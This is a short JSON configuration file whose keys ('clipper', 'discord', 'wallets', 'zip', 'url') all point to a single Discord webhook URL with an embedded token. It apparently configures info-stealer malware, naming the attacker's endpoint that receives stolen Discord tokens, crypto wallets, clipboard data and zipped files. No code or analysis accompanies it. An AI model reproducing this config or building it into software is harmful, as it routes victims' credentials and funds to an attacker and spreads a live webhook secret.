{
    "url": "https://discord.com/api/webhooks/987290614284554270/sOeG37U4-DgS3YS1vq-xr9-6q6yIn9PkhoZnJKR3zUJBLMHs9PgbQ2-mHUIN6YqObMdR",
    "clipper": "https://discord.com/api/webhooks/987290614284554270/sOeG37U4-DgS3YS1vq-xr9-6q6yIn9PkhoZnJKR3zUJBLMHs9PgbQ2-mHUIN6YqObMdR",
    "discord": "https://discord.com/api/webhooks/987290614284554270/sOeG37U4-DgS3YS1vq-xr9-6q6yIn9PkhoZnJKR3zUJBLMHs9PgbQ2-mHUIN6YqObMdR",
    "wallets": "https://discord.com/api/webhooks/987290614284554270/sOeG37U4-DgS3YS1vq-xr9-6q6yIn9PkhoZnJKR3zUJBLMHs9PgbQ2-mHUIN6YqObMdR",
    "zip": "https://discord.com/api/webhooks/987290614284554270/sOeG37U4-DgS3YS1vq-xr9-6q6yIn9PkhoZnJKR3zUJBLMHs9PgbQ2-mHUIN6YqObMdR"
}
